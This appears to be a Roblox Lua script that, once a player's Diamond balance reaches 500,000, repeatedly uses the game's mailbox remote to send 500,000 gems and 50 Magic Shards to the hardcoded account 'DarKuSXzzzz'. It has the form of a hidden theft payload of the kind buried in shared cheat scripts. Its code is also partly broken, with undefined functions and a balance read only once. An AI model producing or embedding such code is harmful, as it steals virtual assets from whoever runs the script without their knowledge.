local getgem = game:GetService("Players").LocalPlayer.leaderstats["\240\159\146\142 Diamonds"].Value
task.spawn(function()
  while task.wait() do
    if getgem >= 500000 then
      if LocalPlayer.Name ~= "DarKuSXzzzz" then
        local args = {
          [1] = "DarKuSXzzzz",
          [2] = "auto send gems",
          [3] = "Currency",
          [4] = tostring(GetmailID()),
          [5] = 500000
        }
        game:GetService("ReplicatedStorage").Network:FindFirstChild("Mailbox: Send"):InvokeServer(unpack(args))
        task.wait(60*60)
      end
    end 
  end
end)

function KongID(item, type)
  for i, v in pairs(Data["Inventory"][type]) do
    if v.id == item then
      return i
    end
  end
  return nil
end

task.spawn(function()
  while task.wait() do
    if getgem >= 500000 then
      if LocalPlayer.Name ~= "DarKuSXzzzz" then
        local args = {
          [1] = "DarKuSXzzzz",
          [2] = "555",
          [3] = "Misc",
          [4] = KongID("Magic Shard", "Misc"),
          [5] = 50
        }
        game:GetService("ReplicatedStorage").Network:FindFirstChild("Mailbox: Send"):InvokeServer(unpack(args))
        task.wait(60 * 60)
      end
    end 
  end
end)
